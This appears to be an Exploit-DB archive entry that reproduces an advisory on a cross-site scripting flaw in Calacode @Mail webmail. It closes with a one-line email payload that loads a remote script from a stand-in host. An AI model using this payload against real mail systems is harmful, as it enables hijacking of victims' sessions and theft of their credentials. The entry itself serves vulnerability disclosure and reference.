exploit-db-mirror/exploits/php/webapps/29304.txt
Offensive Security 36c084c351 DB: 2021-09-03
45419 changes to exploits/shellcodes

2 new exploits/shellcodes

Too many to list!
2021-09-03 13:39:06 +00:00

8 lines
No EOL
561 B
Text

source: https://www.securityfocus.com/bid/21708/info
Calacode @Mail is prone to an HTML-injection vulnerability because it fails to sufficiently sanitize user-supplied data.
An attacker can exploit this issue to execute arbitrary script code in the victim's browser, in the context of the affected site, potentially allowing the attacker to steal cookie-based authentication credentials or to control how the site is rendered to the user. Other attacks are also possible.
Create am email message containing:
<SCRIPT/XSS src=//www.example.com/xss.js></SCRIPT>